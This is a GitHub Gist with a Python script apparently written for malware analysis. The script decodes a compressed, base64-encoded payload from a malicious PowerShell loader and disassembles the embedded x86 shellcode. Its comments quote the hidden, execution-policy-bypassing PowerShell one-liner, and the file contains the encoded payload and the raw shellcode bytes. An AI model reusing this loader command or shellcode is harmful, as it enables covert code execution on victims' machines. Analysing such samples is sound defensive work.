Last active
July 21, 2023 14:11
-
-
Save strazzere/5faa709a3db9e1dcf3b5 to your computer and use it in GitHub Desktop.
Dump encoded compress powershell stream
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # | |
| # Decompling something being loaded in through powershell | |
| # | |
| # | |
| # diff <diff@sentinalone.com> | |
| # | |
| # | |
| # It was basically this code; | |
| # http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html | |
| # | |
| # | |
| # PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass -Command Invoke-Expression \ | |
| #$(New-Object IO.StreamReader \ | |
| #($(New-Object IO.Compression.DeflateStream \ | |
| #($(New-Object IO.MemoryStream (, $([Convert]::FromBase64String(" & str & ")))), [IO.Compression.CompressionMode]::Decompress)), | |
| #[Text.Encoding]::ASCII)).ReadToEnd();""" | |
| # | |
| import base64 | |
| import zlib | |
| encoded = "nVZNi+NGEL37VzRGB5uxh5Zan2sGdpMlsBBCYIbdg/Gh1WplRGTZ2PLGs0n+e/SeXJpMcgm5tPqjuj5evapW4NSDej+fbT+27af98XDqF/Nf/anzrYnuq7adL3fqeCnbxqlzb/vh46/9cK4+df3P/Ul9bk79xbYf2vbgFre931bq0nS9ut6+L7fvt+Xmf9v5/uRt75+eh08ldi43vV9X6tXybfY327edf1rfn7+6U/9fbO/9/uz7xb81T1HN38+CwwDkh6paP70cvVoPd0p/+ujrpmv65tCpwKn1T3bv1fxL05lortbdsDofrfOKOz9cOgfJs1of7fncP58us+D6EBzevXsDsl7pa6g1Pmb8xHq5UdvvXnq/3e2CMzKqr6UdTop0GOoMMgWu1cNQYeYrmWXxMEQYagyJx7IcBofTMhyG1MEWZgn0hckwaPNmmWPpcbeGsI9wDXsaqizuFjCZl2LIQMRh0BjCUJRyL0NcCfYMXcNejVODYEo6XoiIhckY8WoEmMGQg3ANawQiwcxb8a+AlgLCKYSzejrFtRh7JYFgqIgyh0iOa0kuwhXkEuYjlQN6WuFaSgy0eGoTgcRjr4D6DEOOA8dQtYBTOdkrjSQqwUGcS7zGi3GiFmdyN8JBAeM5FDjsOXhv6DjTg5mB9zFEIiydl4iIeAzNkROfYy+ocVaSSMBUv+rDtYw4w12NvQJDSIitIJkQCCusI0HSXJSSf0yyDyVKkvB1SGNhXVEIzjoRXwgEgzZW3GWAJA1h14QENyzDYoBMciQeEA3qS0g9KE0x5NRMXAiYESdzRKmZhUqskQzEmaklEAm5hlkaTiJGWEIMLEuDDPOSCpKVfMnIMGaa3MAyyt7IkX+OHNcC51hb0x5nrNo8FbAJxMh7KGXLINisUE2qELWpTCvcdRgKK6rI2AyIx7XEm+GAxRlBLsUyhuYCSFaZxEuvKELqsWYYbz15ReaweVhWSiGEKyEcFcIwVwq5rJYEEKE6FxF2hpp9jXVZS1aZ/TCTpLhcgKgLwYqusWmRUiw1cpw8oKfsomybIZZjLzZy16ayF5diiPwjatwb20gsuBBxtrmSHTOXpJBwI+soHApg5BXLtKBJ0pZA5KKPCio2X+aIBNbiKXnK6hm7SiWpZYPKveSNTXWsBS2w82GhFjZfZp98YdWyjpJiIlw+xcGeTZN8oyiXCVZEiHfpOJ8JXYhwmYoCFrZnI6NX2BubOdwYa4EvItsX1JOEZkooWcJcZoQzlT12THKSgBXsSNMe2wiXY+IBTkiYYNzj1NQiUrFg+U4bYR3bDbvoWB8T9cj2FAd8ZwwdiiQY0oI5yswUB1tkOWHFxxoReezlE37M5digtOTD0pAR/JhftkNmlSaZLT6VdHd8OogaOU6HCDbTSBJSgRelLHG+TGzrI5LTKz5mNRHAbCVpHF8/dlHizAwmm1l9OKlF0DzoTdCodeuHxdnd/+i7X/rndbgcdu/ulup3/E/dfui24x/dbhFc758Ow8JEi+Vd0CxXari6DZrdSoVL9Yc6XPp1d2nbzZ+z4Bv/yN78jg6orYLrCh/8iT329tSvH1vvj2r96N2hqxR+2LT+Cw==" | |
| # [Convert]::FromBase64String | |
| decoded = base64.b64decode(encoded) | |
| # IO.Compression.DeflateStream | |
| # 15 is the default parameter, negative makes it ignore the gzip header | |
| decompressed = zlib.decompress(decoded, -15) | |
| # Disassemble above code | |
| from capstone import * | |
| code = b"0xba\x96\xf7\x49\x1f\xd9\xed\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x6c\x31\x56\x15\x03\x56\x15\x83\xee\xfc\xe2\x63\x0b\xa1\x9d\x8b\xf4\x32\xc2\x02\x11\x03\xc2\x70\x51\x34\xf2\xf3\x37\xb9\x79\x51\xac\x4a\x0f\x7d\xc3\xfb\xba\x5b\xea\xfc\x97\x9f\x6d\x7f\xea\xf3\x4d\xbe\x25\x06\x8f\x87\x58\xea\xdd\x50\x16\x58\xf2\xd5\x62\x60\x79\xa5\x63\xe0\x9e\x7e\x85\xc1\x30\xf4\xdc\xc1\xb3\xd9\x54\x48\xac\x3e\x50\x03\x47\xf4\x2e\x92\x81\xc4\xcf\x38\xec\xe8\x3d\x41\x28\xce\xdd\x34\x40\x2c\x63\x4e\x97\x4e\xbf\xdb\x0c\xe8\x34\x7b\xe9\x08\x98\x1d\x7a\x06\x55\x6a\x24\x0b\x68\xbf\x5e\x37\xe1\x3e\xb1\xb1\xb1\x64\x15\x99\x62\x05\x0c\x47\xc4\x3a\x4e\x28\xb9\x9e\x04\xc5\xae\x93\x46\x82\x5e\xce\x0c\x52\xf7\x67\x84\x3c\x6e\xd3\x3e\x8d\x07\xfd\xb9\xf2\x3d\x30\x1d\x5f\xed\x61\xf2\x33\x79\xbf\xa2\xca\xde\x40\x9f\x7e\x72\xd4\x23\xd2\x27\x40\x9f\xd5\xc7\x90\x37\x03\xc7\x90\xc7\x83\x86\xe1\x93\xbe\x22\x49\x64\x02\x01\x25\xa3\xc2\xd6\xc6\x9a\x86\xb3\x78\x4f\x5f\x76\x0f\x2a\x66\x44\x9c\xd7\xca\xc7\x2a\x2c\xa5\x72\xfe\x22\x6a\x32\xa4\xd9\xe9\xb5\x29\x55\xcb\x0b\xa0\x30\x40\xf8\x55\xba\xf1\x53\xef\x6e\xce\x17\x79\xc8\x64\xf9\xe1\xa5\x11\x9e\x81\x7a\x8d\x22\x2b\x31\x12\x96\xf3\xa5\xa6\x96\x4b\x79\x82\x4f\x4b\xd5\x64\xc7\xc2\x4a\xb2\x18\x01\xfd\xfd\xb4\xc1\xfe\x33\xdb\x95\xac\x60\x48\xc2\x01\xd1\x06\x07\xf0\xf3\xed\x28\x2e\x9d\x78\xdc\x8e\xca\xfc\xd3\x30\x0b\x74\xf3\x5b\x0f\xd6\x99\x84\x59\xbe\x28\xfd\xfb\xb8\x2d\xd4\x57\x96\x82\x84\x01\x70\x09\x2d\xb6\xfb\xae\xe4\x43\x3b\x25\x0f\x03\xc9\x1c\xe7\xd7\x31\x9e\xf8\x8d\x71\xf6\xf8\x41\x72\x06\x91\x61\x72\x46\x61\x31\x1a\x1e\xc5\xe6\x3f\x61\xd0\x9a\x93\xce\x52\x7b\x44\x98\x64\xa4\x6b\x58\x36\xf2\x03\x4a\x2e\x73\x31\x95\x9b\x01\x76\x1d\xeb\x81\x70\xdc\x30\x10\xbe\xab\x53\x43\xfc\x0c\x74\x03\xfd\x4d\x7b\xdd\x38\x83\xaa\x2f\x0d\xdb\x9c\x7e\x43\x2c\xcf\xb1\x91\x6a\x0f\x09\x25\x3f\xad\x3b\xac\x3f\xe1\x3c\xe5" | |
| md = Cs(CS_ARCH_X86, CS_MODE_32) | |
| for i in md.disasm(code, 0x1000): | |
| print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str)) | |
| # 0x1000: xor byte ptr [eax + 0x62], bh | |
| # 0x1003: popal | |
| # 0x1004: xchg eax, esi | |
| # 0x1005: test dword ptr [ecx + 0x1f], 0x74d9edd9 | |
| # 0x100c: and al, 0xf4 | |
| # 0x100e: pop esi | |
| # 0x100f: sub ecx, ecx | |
| # 0x1011: mov cl, 0x6c | |
| # 0x1013: xor dword ptr [esi + 0x15], edx | |
| # 0x1016: add edx, dword ptr [esi + 0x15] | |
| # 0x1019: sub esi, -4 | |
| # 0x101c: loop 0x1081 | |
| # 0x101e: or esp, dword ptr [ecx + 0x32f48b9d] | |
| # 0x1024: ret 0x1102 | |
| # 0x1027: add eax, edx | |
| # 0x1029: jo 0x107c | |
| # 0x102b: xor al, 0xf2 | |
| # 0x102d: aaa | |
| # 0x102f: mov ecx, 0x4aac5179 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
this solved me problem! awesome !